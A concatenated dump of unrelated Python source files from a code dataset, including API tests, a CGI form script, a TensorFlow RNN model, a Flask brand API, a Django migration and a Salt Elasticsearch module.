result = api.get_assessments(topicId='131226a6-a1e9-48a1-a5d0-ac94baf8dfd2', page=0, size=2, sort="score:asc")
assert len(result) == 2
def test_single_topic_fail():
with pytest.raises(ApiError):
result = api.get_single_topic('not a uuid')
def test_single_assesment():
result = api.get_single_assessment('7c324b6e-0d83-4392-a79f-b61220ebfff3')
assert result['id'] == '7c324b6e-0d83-4392-a79f-b61220ebfff3'
def test_multi_assesment():
result = api.get_assessments(topicId='131226a6-a1e9-48a1-a5d0-ac94baf8dfd2')
assert len(result) >=2
def test_single_assesment_fail():
with pytest.raises(ApiError):
result = api.get_single_assessment('not a uuid')
def test_single_user_id():
result = api.get_single_contributor('7ff62803-e0a8-4121-b324-d4afe9f60d43')
assert result['id'] == '7ff62803-e0a8-4121-b324-d4afe9f60d43'
def test_single_user_name():
result = api.get_single_contributor('KevTheHermit')
assert result['username'] == 'kevthehermit'
|
StarcoderdataPython
|
3212227
|
<filename>Python/SampleScripts/simple_form.py
#!/usr/bin/python
# Import the CGI module
import cgi
# Required header that tells the browser how to render the HTML.
print "Content-Type: text/html\n\n"
# Define function to generate HTML form.
def generate_form():
print "<html>\n"
print "<head>\n"
print "\t<meta content='text/html; charset=utf-8' http-equiv='Content-Type'>\n"
print "\t<title>Name and Age Form</title>\n"
print "</head>\n"
print "<body bgcolor = white>\n"
print "\t<h3>Please, enter your name and age.</h3>\n"
print "\t<table border = 0>\n"
print "\t\t<form method = post action = \"simple_form.py\">\n"
print "\t\t<tr><th>Name:</th><td><input type = text name = \"name\"></td><tr>\n"
print "\t\t<tr><th>Age:</th><td><input type = text name = \"age\"></td></tr>\n"
print "\t</table>\n"
print "\t<input type = hidden name = \"action\" value = \"display\">\n"
print "\t<input type = submit value = \"Enter\">\n"
print "\t</form>\n"
print "</body>\n"
print "</html>\n"
# Define function display data.
def display_data(name, age):
print "<html>\n"
print "<head>\n"
print "\t<title>Age and Name Information Form</title>\n"
print "</head>\n"
print "<body>\n"
print "<h1>Name and Age Response Form</h1>"
print "<p>The name entered was: %s</p>" % (name)
print "<p>The age entered was: %s</p>" % (age)
print "<p>%s, you are %s years old.</p>" % (name, age)
print "</BODY>\n"
print "</HTML>\n"
# Define main function.
def main():
form = cgi.FieldStorage()
if (form.has_key("action") and form.has_key("name") and form.has_key("age")):
if (form["action"].value == "display"):
display_data(form["name"].value, form["age"].value)
else:
generate_form()
def mainTest():
generate_form()
# Call main function.
main()
|
StarcoderdataPython
|
1604769
|
from typing import Iterable, Union, TYPE_CHECKING
from dotty_dict import Dotty
from marshmallow import Schema
from marshmallow.fields import Nested, Dict, List
if TYPE_CHECKING:
from ddb.feature import Feature
def _get_stop_fields_from_schema(schema: Schema, stack, ret):
for field_name, field in schema.fields.items():
stack.append(field_name)
if isinstance(field, Dict):
ret.append(tuple(stack))
if isinstance(field, List):
ret.append(tuple(stack))
if isinstance(field, Nested):
_get_stop_fields_from_schema(field.schema, stack, ret)
stack.pop()
def _get_stop_fields(features: Iterable['Feature']):
ret = []
stack = []
for feature in features:
stack.append(feature.name)
_get_stop_fields_from_schema(feature.schema(), stack, ret)
stack.pop()
return ret
def to_environ(data: Union[Dotty, dict], env_prefix) -> dict:
"""
Export configuration to environment dict.
"""
return _flatten(env_prefix, "_", "_%s_",
lambda x: str.upper(x).replace('-', '_'),
str,
data=dict(data))
def flatten(data: Union[Dotty, dict], prefix=None, sep=".", array_index_format="[%s]",
key_transformer=None, value_transformer=None, keep_primitive_list=False,
stop_for_features=None) -> dict:
"""
Export configuration to a flat dict.
"""
stop_for = tuple(map(sep.join, _get_stop_fields(stop_for_features))) if stop_for_features is not None else ()
return _flatten(prefix, sep, array_index_format,
key_transformer, value_transformer,
keep_primitive_list, stop_for, data=dict(data))
def _flatten(prefix=None, sep=".", array_index_format="[%s]",
key_transformer=None, value_transformer=None, keep_primitive_list=False,
stop_for=(), data=None, output=None) -> dict:
if output is None:
output = {}
if prefix is None:
prefix = ""
if key_transformer is None:
key_transformer = lambda x: x
if value_transformer is None:
value_transformer = lambda x: x
stop_recursion = False
if prefix in stop_for:
stop_recursion = True
if not stop_recursion and isinstance(data, dict):
for (name, value) in data.items():
key_prefix = (prefix + sep if prefix else "") + key_transformer(name)
key_prefix = key_transformer(key_prefix)
_flatten(key_prefix, sep, array_index_format,
key_transformer, value_transformer, keep_primitive_list,
stop_for, value, output)
elif not stop_recursion and isinstance(data, list):
if keep_primitive_list and (not data or
not set(filter(lambda x: x not in (int, float, bool, str), set(map(type, data))))):
output[prefix] = value_transformer(data)
else:
i = 0
for value in data:
replace_prefix = (prefix if prefix else "") + (array_index_format % str(i))
replace_prefix = key_transformer(replace_prefix)
_flatten(replace_prefix, sep, array_index_format,
key_transformer, value_transformer, keep_primitive_list,
stop_for, value, output)
i += 1
else:
output[prefix] = value_transformer(data)
return output
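# Usage sketch (illustrative, no Feature schemas involved):
#     flatten({"a": {"b": 1, "c": [1, 2]}})
#     -> {"a.b": 1, "a.c[0]": 1, "a.c[1]": 2}
#     to_environ({"a": {"b": 1}}, "DDB")
#     -> {"DDB_A_B": "1"}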
|
StarcoderdataPython
|
11316199
|
<filename>plot_result.py
import numpy as np
import argparse
import matplotlib.pyplot as plt
import copy
import scipy.io as sio
if __name__ == '__main__':
trial = 50
K = 20
N = 1
SNR = 100
B = 0
E = 1
lr = 0.05
PL = 3.0
P_r = 0.1
iid = 1
noniid_level = 2
loc = 50
kappa = 0.4
filename = 'store/trial_{}_K_{}_N_{}_B_{}_E_{}_lr_{}_SNR_{}_PL_{}_Pr_{}.npz'.format(trial, K, N, B, E, lr, SNR, PL,
P_r)
print(filename)
nmse = np.zeros(5)
a = np.load(filename, allow_pickle=1)
result_CNN_set = a['arr_1']
result_MSE_set = a['arr_2']
result_NMSE_set = a['arr_2']
nmse1 = a['arr_3']
nmse2 = a['arr_4']
nmse4 = a['arr_6']
for i in range(trial):
if i == 0:
res_CNN = copy.deepcopy(result_CNN_set[0])
else:
for item in res_CNN.keys():
res_CNN[item] += copy.deepcopy(result_CNN_set[i][item])
for item in res_CNN.keys():
res_CNN[item] = copy.deepcopy(res_CNN[item] / trial)
test_accuracy1 = res_CNN['accuracy_test1']
test_accuracy2 = res_CNN['accuracy_test2']
test_accuracy3 = res_CNN['accuracy_test3']
test_accuracy5 = res_CNN['accuracy_test5']
nmse[1] = 10 * np.log10(np.mean(nmse1[~np.isnan(nmse1)]))
nmse[2] = 10 * np.log10(np.mean(nmse2[~np.isnan(nmse2)]))
nmse[4] = 10 * np.log10(np.mean(nmse4[~np.isnan(nmse4)]))
matfile = 'matlab/training_result/cmp_time_trial_{}_K_{}_N_{}_B_{}_E_{}.mat'.format(trial, K, N, B, E)
sio.savemat(matfile, mdict={'test_accuracy1': test_accuracy1[0: 1001], 'test_accuracy2': test_accuracy2[0: 501],
'test_accuracy3': test_accuracy3[0: 1001], 'test_accuracy5': test_accuracy5[0: 501]})
matfile2 = 'matlab/training_result/cmp_time_trial_{}_K_{}_N_{}_B_{}_E_{}_NMSE.mat'.format(trial, K, N, B, E)
sio.savemat(matfile2, mdict={'nmse': nmse})
plt.plot(np.arange(0, len(test_accuracy1)), test_accuracy1, 'k--', label=r'Error-Free Channel')
plt.plot(np.arange(0, 2 * len(test_accuracy2), 2), test_accuracy2, '-o', markersize=6, markevery=100,
label=r'Proposed Scheme')
plt.plot(np.arange(0, len(test_accuracy3)), test_accuracy3, '-*', markersize=8, markevery=100,
label=r'Conventional')
plt.plot(np.arange(0, 2 * len(test_accuracy5), 2), test_accuracy5, '->', markersize=6, markevery=100,
label=r'Existing Scheme')
plt.legend()
plt.xlim([0, 1000])
plt.ylim([0, 0.9])
plt.xlabel('Transmission Time Slot')
plt.ylabel('Test Accuracy')
plt.grid()
plt.show()
|
StarcoderdataPython
|
3527698
|
import os, sys, subprocess
import glob
import datetime
import random
import pyttsx3
import time
import psutil
import speech_recognition as sr
import webbrowser
import requests
#for voice in voices:
# print(voice, voice.id)
def stop(program):
try:
for pid in (process.pid for process in psutil.process_iter() if process.name().lower()== program+".exe"):
os.kill(pid,9)
print(program+" has been stopped.")
except SystemError:
print(SystemError)
def find_file(file):
file = file.replace(" ","*")
path=os.path.join(os.path.expanduser("~"),"Music","*" + file + "*")
path2=os.path.join(os.path.expanduser("~"),"Downloads","*" + file + "*")
file=glob.glob(path,recursive=True) + glob.glob(path2,recursive=True)
return len(file), file
def open_file(filename):
if sys.platform == "win32":
os.startfile(filename)
else:
opener = "open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, filename])
def disrespect():
roast=["You suck at this so much,that it is incomprehensible.",
" Your mom would be proud.......of your dumbness",
"I have a puppy that do this better than you"]
return roast[random.randint(0,2)]
|
StarcoderdataPython
|
8054055
|
<gh_stars>100-1000
import pytest
@pytest.mark.php_fpm
def test_ping(host):
cmd = host.run("php-fpm-healthcheck")
assert cmd.rc == 0
@pytest.mark.php_fpm
def test_ping_verbose(host):
cmd = host.run("php-fpm-healthcheck -v")
assert cmd.rc == 0
assert "Trying to connect to php-fpm via:" in cmd.stdout
assert "status output:" in cmd.stdout
assert "pool:" in cmd.stdout
|
StarcoderdataPython
|
3209
|
<gh_stars>10-100
# Generated by Django 2.1.7 on 2019-08-09 09:36
from django.db import migrations, models
def migrate_public_event(apps, schema_editor):
"""Migrate options previously with no contents (displayed as "Other:")
to a new contents ("other").
The field containing these options is in CommonRequest abstract model,
implemented in WorkshopRequest, WorkshopInquiryRequest, and
SelfOrganizedSubmission models."""
WorkshopRequest = apps.get_model('workshops', 'WorkshopRequest')
WorkshopInquiryRequest = apps.get_model('extrequests',
'WorkshopInquiryRequest')
SelfOrganizedSubmission = apps.get_model('extrequests',
'SelfOrganizedSubmission')
WorkshopRequest.objects.filter(public_event="") \
.update(public_event="other")
WorkshopInquiryRequest.objects.filter(public_event="") \
.update(public_event="other")
SelfOrganizedSubmission.objects.filter(public_event="") \
.update(public_event="other")
class Migration(migrations.Migration):
dependencies = [
('workshops', '0190_auto_20190728_1118'),
('extrequests', '0008_auto_20190809_1004'),
]
operations = [
migrations.AlterField(
model_name='workshoprequest',
name='host_responsibilities',
field=models.BooleanField(default=False, verbose_name='I understand <a href="https://docs.carpentries.org/topic_folders/hosts_instructors/hosts_instructors_checklist.html#host-checklist">the responsibilities of the workshop host</a>, including recruiting local helpers to support the workshop (1 helper for every 8-10 learners).'),
),
migrations.AlterField(
model_name='workshoprequest',
name='requested_workshop_types',
field=models.ManyToManyField(help_text='If your learners are new to programming and primarily interested in working with data, Data Carpentry is likely the best choice. If your learners are interested in learning more about programming, including version control and automation, Software Carpentry is likely the best match. If your learners are people working in library and information related roles interested in learning data and software skills, Library Carpentry is the best choice. Please visit the <a href="https://software-carpentry.org/lessons/">Software Carpentry lessons page</a>, <a href="http://www.datacarpentry.org/lessons/">Data Carpentry lessons page</a>, or the <a href="https://librarycarpentry.org/lessons/">Library Carpentry lessons page</a> for more information about any of our lessons.', limit_choices_to={'active': True}, to='workshops.Curriculum', verbose_name='Which Carpentries workshop are you requesting?'),
),
migrations.AlterField(
model_name='workshoprequest',
name='scholarship_circumstances',
field=models.TextField(blank=True, help_text='Required only if you request a scholarship.', verbose_name='Please explain the circumstances for your scholarship request and let us know what budget you have towards The Carpentries workshop fees.'),
),
migrations.AlterField(
model_name='workshoprequest',
name='public_event',
field=models.CharField(blank=True, choices=[('invite', 'This event is open to learners by invitation only.'), ('closed', 'This event is open to learners inside of my institution.'), ('public', 'This event is open to learners outside of my institution.'), ('other', 'Other:')], default='', help_text='Many of our workshops restrict registration to learners from the hosting institution. If your workshop will be open to registrants outside of your institution please let us know below.', max_length=20, verbose_name='Is this workshop open to the public?'),
),
migrations.RunPython(migrate_public_event),
]
|
StarcoderdataPython
|
168853
|
from huobi import RequestClient
request_client = RequestClient()
trade_statistics = request_client.get_24h_trade_statistics("btcusdt")
print("---- Statistics ----")
print("Timestamp: " + str(trade_statistics.timestamp))
print("High: " + str(trade_statistics.high))
print("Low: " + str(trade_statistics.low))
print("Open: " + str(trade_statistics.open))
print("Close: " + str(trade_statistics.close))
print("Volume: " + str(trade_statistics.volume))
|
StarcoderdataPython
|
1620555
|
<reponame>Naopil/EldenBot<gh_stars>0
import discord
from util.exception import InvalidArgs, NotFound
class CmdReaction:
async def cmd_addreaction(self, *args : str, client, channel, message, **_):
if len(args) < 2:
raise InvalidArgs("Invalid syntax, ``/addreaction message_id emoji_name``")
if not args[0].isdigit():
raise InvalidArgs(f"First argument must be a number, got \"{args[0]}\"")
msg = await channel.fetch_message(int(args[0]))
if not msg:
raise NotFound(f"Message with id \"{args[0]}\" not found")
emoji = discord.utils.get(client.emojis, name=args[1])
if not emoji:
raise NotFound(f"Emoji named \"{args[1]}\" not found")
try:
await message.delete()
        except Exception:
            # Ignore failures to delete the invoking message (e.g. missing permissions)
            pass
await msg.add_reaction(emoji)
|
StarcoderdataPython
|
4890456
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
import sys
from setuptools.command.test import test as TestCommand
#try:
# import multiprocessing # Workaround for http://bugs.python.org/issue15881
#except ImportError:
# pass
# Pytest
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['tests', '--verbose']
self.test_suite = True
def run_tests(self):
#import here, cause outside the eggs aren't loaded
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
CLASSIFIERS = [
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Programming Language :: Python',
'Programming Language :: JavaScript',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Multimedia :: Sound/Audio',
'Topic :: Multimedia :: Sound/Audio :: Analysis',
'Topic :: Multimedia :: Sound/Audio :: Players',
'Topic :: Multimedia :: Sound/Audio :: Conversion',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Software Development :: Libraries :: Python Modules',
]
KEYWORDS = 'audio analysis features extraction MIR transcoding graph visualize plot HTML5 interactive metadata player'
setup(
# Package
name='TimeSide-Dummy',
install_requires=[
'timeside',
# Dependencies for Dummy analyzers
],
# PyPI
url='https://github.com/Parisson/TimeSide-Dummy',
description="Dummy TimeSide plugins",
long_description=open('README.rst').read(),
author="<NAME>, <NAME>",
author_email="<EMAIL>, <EMAIL>",
version='0.1',
platforms=['OS Independent'],
license='MIT',
classifiers=CLASSIFIERS,
keywords=KEYWORDS,
include_package_data=True,
zip_safe=False,
# Tests
tests_require=['pytest'],
cmdclass={'test': PyTest},
)
|
StarcoderdataPython
|
9602237
|
times = int(input())
# the whole alphabet
alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
for i in range(times):
characters = {char.lower() for char in list(input().rstrip())} # test with set instead of list
    # removed an unnecessary print statement here
missing = '' # the missing characters will be added if they are missing
for letter in alphabet:
# for every letter in the alphabet we check if we have it in our string
# if not, we add it to missing
if letter not in characters:
missing += letter
print('pangram' if not missing else 'missing', missing) # replaced panagram with pangram...
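# Example behaviour (illustrative): with times = 1 and the input line
# "The quick brown fox jumps over the lazy dog" the script prints "pangram",
# while "hello world" prints "missing abcfgijkmnpqstuvxyz".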
|
StarcoderdataPython
|
1963411
|
<filename>rnn_model.py
import tensorflow as tf
import numpy as np
from tensorflow.contrib import rnn
from tensorflow.contrib import legacy_seq2seq
class RNNModel:
def __init__(self,
vocabulary_size,
batch_size,
sequence_length,
hidden_layer_size,
cells_size,
gradient_clip=5.,
training=True):
        cells = [rnn.LSTMCell(hidden_layer_size) for _ in range(cells_size)]
        self.cell = rnn.MultiRNNCell(cells)
self.input_data = tf.placeholder(tf.int32, [batch_size, sequence_length])
self.targets = tf.placeholder(tf.int32, [batch_size, sequence_length])
self.initial_state = self.cell.zero_state(batch_size, tf.float32)
with tf.variable_scope("rnn", reuse=tf.AUTO_REUSE):
softmax_layer = tf.get_variable("softmax_layer", [hidden_layer_size, vocabulary_size])
softmax_bias = tf.get_variable("softmax_bias", [vocabulary_size])
with tf.variable_scope("embedding", reuse=tf.AUTO_REUSE):
embedding = tf.get_variable("embedding", [vocabulary_size, hidden_layer_size])
inputs = tf.nn.embedding_lookup(embedding, self.input_data)
inputs = tf.split(inputs, sequence_length, 1)
inputs = [tf.squeeze(input_, [1]) for input_ in inputs]
def loop(previous, _):
previous = tf.matmul(previous, softmax_layer) + softmax_bias
previous_symbol = tf.stop_gradient(tf.argmax(previous, 1))
return tf.nn.embedding_lookup(embedding, previous_symbol)
with tf.variable_scope("rnn", reuse=tf.AUTO_REUSE):
outputs, last_state = legacy_seq2seq.rnn_decoder(inputs, self.initial_state, self.cell, loop_function=loop if not training else None)
output = tf.reshape(tf.concat(outputs, 1), [-1, hidden_layer_size])
self.logits = tf.matmul(output, softmax_layer) + softmax_bias
self.probabilities = tf.nn.softmax(self.logits)
loss = legacy_seq2seq.sequence_loss_by_example([self.logits], [tf.reshape(self.targets, [-1])], [tf.ones([batch_size * sequence_length])])
with tf.name_scope("cost"):
self.cost = tf.reduce_sum(loss) / batch_size / sequence_length
self.final_state = last_state
self.learning_rate = tf.Variable(0.0, trainable=False)
trainable_vars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, trainable_vars), gradient_clip)
with tf.variable_scope("optimizer", reuse=tf.AUTO_REUSE):
optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.train_op = optimizer.apply_gradients(list(zip(grads, trainable_vars)))
tf.summary.histogram("logits", self.logits)
tf.summary.histogram("probabilitiess", self.probabilities)
tf.summary.histogram("loss", loss)
tf.summary.scalar("cost", self.cost)
tf.summary.scalar("learning_rate", self.learning_rate)
def sample(self, sess, chars, vocabulary, length):
state = sess.run(self.cell.zero_state(1, tf.float32))
text = ""
char = chars[0]
for _ in range(length):
x = np.zeros((1, 1))
x[0, 0] = vocabulary[char]
feed = {self.input_data: x, self.initial_state: state}
[probabilities, state] = sess.run([self.probabilities, self.final_state], feed)
probability = probabilities[0]
total_sum = np.cumsum(probability)
            prob_sum = np.sum(probability)
            sample = int(np.searchsorted(total_sum, np.random.rand(1) * prob_sum))
predicted = chars[sample]
text += predicted
char = predicted
return text
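if __name__ == "__main__":
    # Minimal smoke-test sketch (illustrative only): builds the model on a tiny made-up
    # vocabulary and samples from the untrained network. Assumes a TensorFlow 1.x
    # environment with tf.contrib available, as required by the imports above.
    corpus = "hello world"
    chars = sorted(set(corpus))
    vocabulary = {c: i for i, c in enumerate(chars)}
    model = RNNModel(vocabulary_size=len(chars), batch_size=1, sequence_length=1,
                     hidden_layer_size=64, cells_size=2, training=False)
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        # Output is gibberish without training; this only demonstrates the sampling API.
        print(model.sample(sess, chars, vocabulary, length=50))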
|
StarcoderdataPython
|
3587317
|
# Generated by Django 2.1.7 on 2019-03-09 06:44
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
class Migration(migrations.Migration):
dependencies = [
('core', '0005_auto_20190309_0304'),
]
operations = [
migrations.CreateModel(
name='CachedRequestResult',
fields=[
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('provider', models.CharField(max_length=255)),
('key', models.CharField(max_length=255)),
('creation_date', models.DateTimeField(default=django.utils.timezone.now)),
('result', django.contrib.postgres.fields.jsonb.JSONField()),
('expire_date', models.DateTimeField()),
('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cache', to='core.Account')),
],
),
]
|
StarcoderdataPython
|
4940169
|
# ch8ex7_goldbachc
"""Has the find_prime_summands(n) and its supporting functions."""
from math import sqrt, floor
def find_prime_summands(n):
"""Find two primes that add up to n.
Parameters:
n - even natural number"""
if n % 2 == 1:
return None, None
    prime = 2  # start from the smallest prime (1 is not a prime number)
    for _ in range(n//2):
        if is_prime(n-prime):
            return prime, n-prime
        prime = next_prime(prime)
    print("An error occurred. Couldn't find two primes adding to", n)
def is_prime(n):
    """Returns True if n is a prime number, False otherwise."""
    if n < 2:
        return False
    for divisor in range(2, floor(sqrt(n)) + 1):
        if n % divisor == 0:
            return False
    return True
def next_prime(n):
"""Returns the next prime number after n."""
while True:
n += 1
if is_prime(n):
return n
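# Example usage (illustrative sketch, not part of the original module):
if __name__ == "__main__":
    for n in (10, 28):
        p, q = find_prime_summands(n)
        print(n, "=", p, "+", q)  # e.g. 10 = 3 + 7, 28 = 5 + 23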
|
StarcoderdataPython
|
5051749
|
from flask import request
from flask_restplus import fields, Namespace, Resource
from http import HTTPStatus
from typing import Dict, List
from .. import API_V1
from ..models import Brand
from ..repos import BRANDS
from ..shared.constants import (AUTHORIZATION_HEADER_DESC, NOT_FOUND,
SUCCESSFULLY_ADDED)
from ..shared.utils import token_required
BRAND_NS = Namespace('brands')
@BRAND_NS.route('/')
class BrandList(Resource):
@BRAND_NS.marshal_list_with(Brand.__model__)
def get(self) -> (List[Brand], HTTPStatus):
return BRANDS, HTTPStatus.OK
@BRAND_NS.expect(Brand.__model__, validate=True)
@BRAND_NS.header('Authorization', AUTHORIZATION_HEADER_DESC)
@BRAND_NS.marshal_with(Brand.__model__,
code=HTTPStatus.CREATED,
description=SUCCESSFULLY_ADDED)
@token_required(roles='admin')
def post(self) -> (Brand, HTTPStatus, Dict[str, str]):
if BRANDS:
identifier = max(map(lambda b: b.id, BRANDS)) + 1
else:
identifier = 1
name = API_V1.payload['name']
brand = Brand(identifier, name)
BRANDS.append(brand)
headers = {'Location': f'{request.base_url}{identifier}'}
return brand, HTTPStatus.CREATED, headers
@BRAND_NS.route('/<int:identifier>')
class BrandSingle(Resource):
@BRAND_NS.marshal_with(Brand.__model__)
@BRAND_NS.response(HTTPStatus.NOT_FOUND, NOT_FOUND)
def get(self, identifier: int) -> (Brand, HTTPStatus):
for brand in BRANDS:
if brand.id == identifier:
return brand, HTTPStatus.OK
BRAND_NS.abort(HTTPStatus.NOT_FOUND,
f'Brand not found with id: {identifier}')
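# Rough usage sketch (illustrative only; the host/port and bearer token are placeholders,
# and the paths assume this namespace is mounted at the API root):
#   curl http://localhost:5000/brands/                         # list brands
#   curl http://localhost:5000/brands/1                        # fetch brand with id 1
#   curl -X POST http://localhost:5000/brands/ \
#        -H "Authorization: Bearer <token>" \
#        -H "Content-Type: application/json" \
#        -d '{"name": "Acme"}'                                 # admin-only create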
|
StarcoderdataPython
|
6618477
|
# -*- coding: utf-8 -*-
'''
Connection module for Elasticsearch
Note: this module is in an early state of development.
:depends: elasticsearch
'''
# TODO
# * improve error/ exception handling
# * implement update methods?
from __future__ import absolute_import
# Import Python libs
import logging
log = logging.getLogger(__name__)
# Import third party libs
try:
import elasticsearch
logging.getLogger('elasticsearch').setLevel(logging.CRITICAL)
HAS_ELASTICSEARCH = True
except ImportError:
HAS_ELASTICSEARCH = False
from salt.ext.six import string_types
def __virtual__():
'''
Only load if elasticsearch libraries exist.
'''
if not HAS_ELASTICSEARCH:
return False
return True
def _get_instance(hosts, profile):
'''
Return the elasticsearch instance
'''
if profile:
if isinstance(profile, string_types):
_profile = __salt__['config.option'](profile)
elif isinstance(profile, dict):
_profile = profile
if _profile:
hosts = _profile.get('host')
if not hosts:
hosts = _profile.get('hosts')
if isinstance(hosts, string_types):
hosts = [hosts]
return elasticsearch.Elasticsearch(hosts)
def alias_create(indices, alias, hosts=None, body=None, profile='elasticsearch'):
'''
Create an alias for a specific index/indices
CLI example::
salt myminion elasticsearch.alias_create testindex_v1 testindex
'''
es = _get_instance(hosts, profile)
try:
result = es.indices.put_alias(index=indices, name=alias, body=body) # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def alias_delete(indices, aliases, hosts=None, body=None, profile='elasticsearch'):
'''
Delete an alias of an index
CLI example::
salt myminion elasticsearch.alias_delete testindex_v1 testindex
'''
es = _get_instance(hosts, profile)
try:
result = es.indices.delete_alias(index=indices, name=aliases)
if result.get('acknowledged', False): # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def alias_exists(aliases, indices=None, hosts=None, profile='elasticsearch'):
'''
Return a boolean indicating whether given alias exists
CLI example::
salt myminion elasticsearch.alias_exists testindex
'''
es = _get_instance(hosts, profile)
try:
if es.indices.exists_alias(name=aliases, index=indices):
return True
else:
return False
except elasticsearch.exceptions.NotFoundError:
return None
except elasticsearch.exceptions.ConnectionError:
# TODO log error
return None
return None
def alias_get(indices=None, aliases=None, hosts=None, profile='elasticsearch'):
'''
Check for the existence of an alias and if it exists, return it
CLI example::
salt myminion elasticsearch.alias_get testindex
'''
es = _get_instance(hosts, profile)
try:
ret = es.indices.get_alias(index=indices, name=aliases) # TODO error handling
return ret
except elasticsearch.exceptions.NotFoundError:
return None
return None
def document_create(index, doc_type, body=None, hosts=None, profile='elasticsearch'):
'''
Create a document in a specified index
CLI example::
salt myminion elasticsearch.document_create testindex doctype1 '{}'
'''
es = _get_instance(hosts, profile)
try:
result = es.index(index=index, doc_type=doc_type, body=body) # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def document_delete(index, doc_type, id, hosts=None, profile='elasticsearch'):
'''
Delete a document from an index
CLI example::
salt myminion elasticsearch.document_delete testindex doctype1 AUx-384m0Bug_8U80wQZ
'''
es = _get_instance(hosts, profile)
try:
if not index_exists(index=index):
return True
else:
result = es.delete(index=index, doc_type=doc_type, id=id)
if result.get('found', False): # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def document_exists(index, id, doc_type='_all', hosts=None, profile='elasticsearch'):
'''
Return a boolean indicating whether given document exists
CLI example::
salt myminion elasticsearch.document_exists testindex AUx-384m0Bug_8U80wQZ
'''
es = _get_instance(hosts, profile)
try:
if es.exists(index=index, id=id, doc_type=doc_type):
return True
else:
return False
except elasticsearch.exceptions.NotFoundError:
return None
except elasticsearch.exceptions.ConnectionError:
# TODO log error
return None
return None
def document_get(index, id, doc_type='_all', hosts=None, profile='elasticsearch'):
'''
Check for the existence of a document and if it exists, return it
CLI example::
salt myminion elasticsearch.document_get testindex AUx-384m0Bug_8U80wQZ
'''
es = _get_instance(hosts, profile)
try:
ret = es.get(index=index, id=id, doc_type=doc_type) # TODO error handling
return ret
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_create(index, body=None, hosts=None, profile='elasticsearch'):
'''
Create an index
CLI example::
salt myminion elasticsearch.index_create testindex
'''
es = _get_instance(hosts, profile)
try:
if index_exists(index):
return True
else:
result = es.indices.create(index=index, body=body) # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_delete(index, hosts=None, profile='elasticsearch'):
'''
Delete an index
CLI example::
salt myminion elasticsearch.index_delete testindex
'''
es = _get_instance(hosts, profile)
try:
if not index_exists(index=index):
return True
else:
result = es.indices.delete(index=index)
if result.get('acknowledged', False): # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_exists(index, hosts=None, profile='elasticsearch'):
'''
Return a boolean indicating whether given index exists
CLI example::
salt myminion elasticsearch.index_exists testindex
'''
es = _get_instance(hosts, profile)
try:
if not isinstance(index, list):
index = [index]
if es.indices.exists(index=index):
return True
else:
return False
except elasticsearch.exceptions.NotFoundError:
return None
except elasticsearch.exceptions.ConnectionError:
# TODO log error
return None
return None
def index_get(index, hosts=None, profile='elasticsearch'):
'''
Check for the existence of an index and if it exists, return it
CLI example::
salt myminion elasticsearch.index_get testindex
'''
es = _get_instance(hosts, profile)
try:
if index_exists(index):
ret = es.indices.get(index=index) # TODO error handling
return ret
except elasticsearch.exceptions.NotFoundError:
return None
return None
def mapping_create(index, doc_type, body, hosts=None, profile='elasticsearch'):
'''
Create a mapping in a given index
CLI example::
salt myminion elasticsearch.mapping_create testindex user '{ "user" : { "properties" : { "message" : {"type" : "string", "store" : true } } } }'
'''
es = _get_instance(hosts, profile)
try:
result = es.indices.put_mapping(index=index, doc_type=doc_type, body=body) # TODO error handling
return mapping_get(index, doc_type)
except elasticsearch.exceptions.NotFoundError:
return None
return None
def mapping_delete(index, doc_type, hosts=None, profile='elasticsearch'):
'''
Delete a mapping (type) along with its data
CLI example::
salt myminion elasticsearch.mapping_delete testindex user
'''
es = _get_instance(hosts, profile)
try:
# TODO check if mapping exists, add method mapping_exists()
result = es.indices.delete_mapping(index=index, doc_type=doc_type)
if result.get('acknowledged', False): # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def mapping_get(index, doc_type, hosts=None, profile='elasticsearch'):
'''
Retrieve mapping definition of index or index/type
CLI example::
salt myminion elasticsearch.mapping_get testindex user
'''
es = _get_instance(hosts, profile)
try:
ret = es.indices.get_mapping(index=index, doc_type=doc_type) # TODO error handling
return ret
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_template_create(name, body, hosts=None, profile='elasticsearch'):
'''
Create an index template
CLI example::
salt myminion elasticsearch.index_template_create testindex_templ '{ "template": "logstash-*", "order": 1, "settings": { "number_of_shards": 1 } }'
'''
es = _get_instance(hosts, profile)
try:
result = es.indices.put_template(name=name, body=body) # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_template_delete(name, hosts=None, profile='elasticsearch'):
'''
Delete an index template (type) along with its data
CLI example::
salt myminion elasticsearch.index_template_delete testindex_templ user
'''
es = _get_instance(hosts, profile)
try:
# TODO check if template exists, add method template_exists() ?
result = es.indices.delete_template(name=name)
if result.get('acknowledged', False): # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_template_exists(name, hosts=None, profile='elasticsearch'):
'''
Return a boolean indicating whether given index template exists
CLI example::
